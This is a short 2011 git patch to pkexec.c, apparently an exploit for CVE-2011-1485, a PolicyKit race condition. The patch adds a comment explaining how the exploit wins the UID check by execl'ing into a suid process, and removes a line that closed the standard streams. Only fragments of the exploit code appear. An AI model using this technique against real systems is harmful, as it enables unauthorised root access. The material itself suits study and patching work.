From 164b5dfcbe58cd5cb813372d89088b71d3d9e7de Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld"
Date: Fri, 2 Sep 2011 18:50:53 -0400
Subject: Add message.

---
 pkexec.c | 14 +++++++++++++-
 1 file changed, 13 insertions(+), 1 deletion(-)

diff --git a/pkexec.c b/pkexec.c
index b0c1f0e..56b28b9 100644
--- a/pkexec.c
+++ b/pkexec.c
@@ -1,3 +1,16 @@
+/*
+ * Howdy folks. This exploits CVE-2011-1485, a race condition in PolicyKit.
+ * pkexec determines the UID of its parent by checking the UID of /proc/PID.
+ * What they really want to be checking is the EUID but this doesn't do it,
+ * so the following exploit wins the race by execl'ing to a suid process
+ * just as pkexec is about to check the UID of the parent process. Greets
+ * to djrbliss.
+ *
+ * - zx2c4
+ * 2-sept-2011
+ *
+ */
+
 #include
 #include
@@ -19,7 +32,6 @@ int main(int argc, char **argv)
 char pid_path[1024];
 sprintf(pid_path, "/proc/%i", getpid());
 printf("[+] Configuring inotify for proper pid.\n");
- close(0); close(1); close(2);
 fd = inotify_init();
 if (fd < 0)
-- 
cgit v1.2.3-59-g8ed1b